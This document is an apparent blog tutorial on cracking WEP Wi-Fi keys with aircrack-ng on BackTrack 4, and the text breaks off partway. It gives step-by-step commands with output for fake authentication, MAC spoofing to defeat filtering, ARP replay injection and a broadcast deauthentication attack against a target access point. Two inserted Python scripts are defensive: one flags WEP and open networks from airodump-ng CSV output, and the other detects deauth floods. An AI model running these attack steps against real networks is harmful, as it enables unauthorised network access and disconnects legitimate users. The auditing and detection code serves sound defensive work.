Cracking WEP with Backtrack 4 and aircrack-ng
(airmon-ng stop wireless_int, ifconfig wireless_int down, macchanger -m XX:XX:XX:XX:XX:XX wireless_int, ifconfig wireless_int up, airmon-ng start wireless_int)
∙ Associate with AP and inject ARP packets (airodump-ng -c <channel> --ivs -w /tmp/filename wireless_int_in_monitormode, aireplay-ng --fakeauth 0 -a <BSSID> -h <local MAC> -e ESSID wireless_int_in_monitormode, aireplay-ng -3 -b <BSSID> wireless_int_in_monitor_mode)
∙ If no ARP is found (and injected) in a reasonable amount of time, try to deauthenticate an existing client (aireplay-ng --deauth 0 -a BSSID -c ClientMAC wireless_int_in_monitor_mode)
∙ Save IVs to file and crack the key (aircrack-ng -0 -b BSSID /tmp/filename.ivs)
In all cases, in all scenarios, the most important component is verifying that you can associate with an AP. You’ll learn some techniques on how to do this in this blog. But let’s not jump ahead.
First, list the adapters:

root@bt:~# airmon-ng

Interface       Chipset         Driver
wifi0           Atheros         madwifi-ng
wlan0           Ralink 2573 USB rt73usb - [phy0]
ath0            Atheros         madwifi-ng VAP (parent: wifi0)
The wifi0 adapter is the Proxim PCMCIA card. wlan0 is the D-Link USB adapter. For this test, we’ll use the Proxim card (wifi0).

The MAC address of this card is 00:20:A6:4F:A9:41 (you can get the MAC address by running ‘ifconfig wifi0’).
First, put the card in monitor mode:

root@bt:~# airmon-ng start wifi0

ath1            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
A new interface called “ath1” has been created. This interface is the one we are going to use in order to find the wireless networks. Launch “airodump-ng ath1” to hop all channels and show the wireless networks that can be found, and the clients (if any) that are currently associated with an Access Point:

root@bt:~# airodump-ng ath1

 CH  1 ][ Elapsed: 1 min ][ 2009-02-19 14:05

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 00:14:BF:89:9C:D3   34      104        0    0  11  54.  WEP  WEP         TestNet

 BSSID              STATION            PWR   Rate  Lost  Packets  Probe
 00:14:BF:89:9C:D3  00:1C:BF:90:5B:A3   55    0-1     0       12  TestNet
 00:14:BF:89:9C:D3  00:19:52:AD:F7      71    0-1    32      441  TestNet

Ok, so we have found a network with ESSID “TestNet”, operating at channel 11. Apparently there are 2 clients connected to this AP.
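The airodump-ng listing above is the same data a network owner can use to find legacy WEP networks in their own environment before anyone else does. The following Python script is an added example, not code from the original post or from the aircrack-ng project: it parses the CSV summary that airodump-ng writes next to a capture when run with -w (the <prefix>-01.csv file) and flags every access point that still uses WEP or no encryption, together with the clients seen on it. The sample CSV is constructed here from the values visible in the screens above plus two made-up neighbouring networks; the column layout follows airodump-ng's real CSV header.

```python
"""Audit the CSV summary that airodump-ng writes next to a capture.

Added example, not code from the original post or from aircrack-ng. It reads
the "<prefix>-01.csv" file airodump-ng produces when started with -w and
lists every network whose Privacy column is WEP or OPN, so a network owner
can find legacy access points. The sample below is constructed from the
page's own airodump-ng screens (TestNet, 00:14:BF:89:9C:D3, channel 11) plus
two invented neighbours; the layout (access-point table, blank line, station
table) is airodump-ng's real one.
"""
import csv
import io

# Constructed sample CSV (the two non-TestNet networks are made up).
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:14:BF:89:9C:D3, 2009-02-19 14:04:12, 2009-02-19 14:05:40, 11, 54, WEP, WEP, OPN, 34, 104, 0, 0.0.0.0, 7, TestNet,
00:16:B6:AA:BB:CC, 2009-02-19 14:04:20, 2009-02-19 14:05:38, 6, 54, WPA2, CCMP, PSK, 28, 88, 0, 0.0.0.0, 9, GuestWPA2,
00:0F:66:11:22:33, 2009-02-19 14:04:30, 2009-02-19 14:05:35, 1, 11, OPN, , , 12, 40, 0, 0.0.0.0, 8, OpenCafe,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:1C:BF:90:5B:A3, 2009-02-19 14:04:15, 2009-02-19 14:05:40, 55, 12, 00:14:BF:89:9C:D3, TestNet
"""

# Privacy values that mean "anyone in radio range can read or forge traffic".
LEGACY = {"WEP", "OPN"}


def parse_airodump_csv(text):
    """Return (access_points, stations): two lists of dicts with stripped keys/values.

    airodump-ng pads every field with a leading space and separates the two
    tables with a blank line, so split on the blank line and strip each cell.
    """
    text = text.replace("\r\n", "\n").strip()
    tables = []
    for block in text.split("\n\n"):
        if not block.strip():
            continue
        rows = []
        for row in csv.DictReader(io.StringIO(block)):
            rows.append({k.strip(): (v or "").strip()
                         for k, v in row.items() if k is not None})
        tables.append(rows)
    aps = tables[0] if tables else []
    stations = tables[1] if len(tables) > 1 else []
    return aps, stations


def find_weak_networks(aps):
    """Flag access points still running WEP or no encryption at all."""
    findings = []
    for ap in aps:
        privacy = ap.get("Privacy", "")
        if privacy not in LEGACY:
            continue
        reason = ("WEP is broken; migrate to WPA2/WPA3" if privacy == "WEP"
                  else "open network: traffic is unencrypted")
        findings.append({"bssid": ap["BSSID"], "essid": ap["ESSID"],
                         "channel": ap["channel"], "privacy": privacy,
                         "reason": reason})
    return findings


def clients_of(stations, bssid):
    """Station MACs that airodump-ng saw associated with the given BSSID."""
    return [s["Station MAC"] for s in stations if s["BSSID"] == bssid]


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    for f in find_weak_networks(aps):
        print(f"{f['bssid']}  ch{f['channel']:>2}  {f['privacy']:<4} "
              f"{f['essid']!r}: {f['reason']}")
        for mac in clients_of(stations, f["bssid"]):
            print(f"    associated client: {mac}")
```

Run against a real file with `parse_airodump_csv(open("/tmp/TestNetAudit1-01.csv").read())`; the WEP finding for TestNet is exactly what an internal audit should raise, since the rest of this post shows how little a WEP key and a MAC filter are worth.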
Let’s see if we can associate with the Access Point with MAC (BSSID) 00:14:BF:89:9C:D3.

First, run airodump-ng again, but set it to look at channel 11. This is required for the AP association/authentication (via aireplay-ng) to operate at channel 11 as well (because you cannot specify the channel to use when running aireplay-ng):

root@bt:/# airodump-ng --channel 11 ath1

Leave the airodump-ng running for now and run the following aireplay-ng command to perform a ‘fake authentication’ attempt:

root@bt:~# aireplay-ng --fakeauth 0 -a 00:14:BF:89:9C:D3 -e TestNet ath1
No source MAC (-h) specified. Using the device MAC (00:20:A6:4F:A9:41)
50  Waiting for beacon frame (BSSID: 00:14:BF:89:9C:D3) on channel 11
50  Sending Authentication Request (Open System) [ACK]
50  AP rejects the source MAC address (00:20:A6:4F:A9:41) ?
Authentication failed (code 1)
53  Sending Authentication Request (Open System) [ACK]
53  AP rejects the source MAC address (00:20:A6:4F:A9:41) ?
Ok – Authentication failed, so the AP does MAC filtering. We could try to use the MAC address of one of the clients that are already connected (by specifying its MAC address using the -h parameter), but we’ll change the MAC address on our interface (which will make all future commands shorter).

First, kill the airodump-ng process. Take wifi0 (ath1) out of monitoring mode:

root@bt:~# airmon-ng stop ath1

ath1            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)

Bring wifi0 down, change the MAC address of wifi0, bring wifi0 up again and then put the interface back in monitor mode:

root@bt:~# ifconfig wifi0 down
root@bt:~# macchanger -m 00:1C:BF:90:5B:A3 wifi0
Current MAC: 00:20:a6:4f:a9:44 (Proxim, Inc.)
Faked MAC:   00:1c:bf:90:5b:a3 (unknown)
root@bt:~# ifconfig wifi0 up
root@bt:~# airmon-ng start wifi0

ath1            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

root@bt:~# ifconfig ath1
ath1      Link encap:UNSPEC  HWaddr 00-1C-BF-90-5B-A3-D0-03-00-00-00-00-00-00-00-00
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:106 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:9448 (9.4 KB)  TX bytes:0 (0.0 B)
Ok, looks good. Let’s see if it makes a difference. Run airodump-ng again (airodump-ng -c 11 ath1) and then try to perform the fake authentication again:

root@bt:/# aireplay-ng --fakeauth 0 -a 00:14:BF:89:9C:D3 -e TestNet ath1
No source MAC (-h) specified. Using the device MAC (00:1C:BF:90:5B:A3)
19  Waiting for beacon frame (BSSID: 00:14:BF:89:9C:D3) on channel 11
19  Sending Authentication Request (Open System) [ACK]
19  Authentication successful
19  Sending Association Request [ACK]
19  Association successful :-) (AID: 1)
If you are connecting to an AP that is a bit picky, then you have some options to tweak the aireplay-ng behaviour:

aireplay-ng -1 6000 -o 1 -q 12 -e TestNet -a 00:14:BF:89:9C:D3 ath1

-1 6000 = reauthenticate every 6000 seconds
-o 1 = only send one set of packets at a time
-q 12 = send keepalive packets every 12 seconds (sometimes, it works better without this last parameter)
From this point forward, you should be able to associate with the AP. If not, there’s no use in continuing with the process.

Ok, now let’s try to crack the key. First, stop the existing airodump process and run airodump-ng with the option to save the IVs to a file (parameter -i or --ivs):

root@bt:~# airodump-ng -c 11 -w /tmp/TestNetAudit1 -i ath1

 CH 11 ][ Elapsed: 12 s ][ 2009-02-19 14:24

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 00:14:BF:89:9C:D3   34 100      135        0    0  11  54.  WEP  WEP    OPN  TestNet

 BSSID              STATION            PWR   Rate  Lost  Packets  Probe
 00:14:BF:89:9C:D3  00:19:52:AD:F7      43    0-1    10       84  TestNet
The number of #Data packets is most likely still very low and does not go up as fast as we want it to. So we need to grab an ARP packet and inject it. First, launch aireplay-ng in injection mode:

root@bt:~# aireplay-ng -3 -b 00:14:BF:89:9C:D3 ath1
For information, no action required: Using gettimeofday() instead of /dev/rtc
14:26:55  Waiting for beacon frame (BSSID: 00:14:BF:89:9C:D3) on channel 11
Saving ARP requests in replay_arp-0219-142655.cap
You should also start airodump-ng to capture replies.
Read 243 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)

(Leave this running – wait until an ARP request is seen. The tool will then automatically attempt to inject the ARP packets, thus increasing the number of data packets (and IVs) on the network.) Some APs require you to be associated (or will perform a disassociate after a while). It might take a couple of minutes before an ARP is seen. If you don’t have a lot of time, it might help trying to associate yourself again:

aireplay-ng --fakeauth 0 -a 00:14:BF:89:9C:D3 -e TestNet ath1
If that does not generate the required ARP packet(s), which should set off the ARP injection, then try to deauthenticate the existing clients (which may not work very well if the AP has MAC filtering enabled. If you have a second client MAC address, you can set your own MAC address to one of the clients and try to deauth the other client…). Keep the aireplay-ng and airodump-ng running and run the deauth attack.

root@bt:/# aireplay-ng --deauth 0 -a 00:14:BF:89:9C:D3 ath1
14:38:15  Waiting for beacon frame (BSSID: 00:14:BF:89:9C:D3) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
14:38:15  Sending
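The deauthentication frames this step sends are unauthenticated management frames, which is exactly what makes them easy to spot from the defending side: a legitimate AP deauthenticates a client rarely and one frame at a time, never in a broadcast burst. The following Python script is an added example (not part of the original post, and not aircrack-ng code): a minimal detector that reads captured management-frame records, one per line in a constructed "time source destination subtype [reason]" shape (an assumption; adapt parse_line to whatever your sensor or tshark field export emits), and raises one alert when a single source address sends ten or more deauth/disassoc frames inside a two-second window. The burst in the sample is constructed to resemble what a monitor interface would see during the command above.

```python
"""Deauthentication-flood detector over captured 802.11 management frames.

Added example, not code from the original post. Each input line is a
constructed record of the form

    HH:MM:SS.mmm  <source MAC>  <destination MAC>  <subtype> [reason]

(an assumed shape; adapt parse_line() to your own sensor or tshark export).
A single address that emits THRESHOLD or more deauth/disassoc frames within
WINDOW_SECONDS is reported once.
"""
from collections import defaultdict, deque

WINDOW_SECONDS = 2.0   # sliding window length
THRESHOLD = 10         # deauth/disassoc frames from one source inside the window

# Constructed sample: a station exchanging data with the page's AP
# (00:14:BF:89:9C:D3), then a burst of twelve broadcast deauth frames carrying
# the AP's address as source, then a single isolated deauth much later.
SAMPLE_FRAMES = (
    ["14:38:14.500 00:1C:BF:90:5B:A3 00:14:BF:89:9C:D3 data"]
    + [f"14:38:15.{i * 10:03d} 00:14:BF:89:9C:D3 FF:FF:FF:FF:FF:FF deauth 7"
       for i in range(12)]
    + ["14:38:16.200 00:14:BF:89:9C:D3 00:1C:BF:90:5B:A3 data",
       # one lone deauth to a constructed client address: normal, not a flood
       "14:38:40.000 00:14:BF:89:9C:D3 02:00:00:00:00:01 deauth 3"]
)


def parse_line(line):
    """Split one record into (seconds since midnight, src, dst, subtype)."""
    ts, src, dst, subtype = line.split()[:4]
    hours, minutes, seconds = ts.split(":")
    return int(hours) * 3600 + int(minutes) * 60 + float(seconds), src, dst, subtype


def detect_deauth_floods(lines, window=WINDOW_SECONDS, threshold=THRESHOLD):
    """Return one alert dict per source address that crosses the threshold."""
    recent = defaultdict(deque)   # src -> timestamps of its recent deauth frames
    alerted = set()
    alerts = []
    for line in lines:
        if not line.strip():
            continue
        ts, src, _dst, subtype = parse_line(line)
        if subtype not in ("deauth", "disassoc"):
            continue               # data and other management frames are ignored
        q = recent[src]
        q.append(ts)
        while q and ts - q[0] > window:   # drop frames that fell out of the window
            q.popleft()
        if len(q) >= threshold and src not in alerted:
            alerted.add(src)
            alerts.append({"src": src, "count": len(q),
                           "first_seen": q[0], "last_seen": ts})
    return alerts


if __name__ == "__main__":
    for a in detect_deauth_floods(SAMPLE_FRAMES):
        print(f"deauth flood from {a['src']}: {a['count']} frames in "
              f"{a['last_seen'] - a['first_seen']:.3f}s")
```

Detection only tells you it happened; the fix is 802.11w (Protected Management Frames), which the AP and clients must both support: deauth and disassoc frames are then integrity-protected, so a spoofed one carrying the AP's address is discarded instead of disconnecting the client.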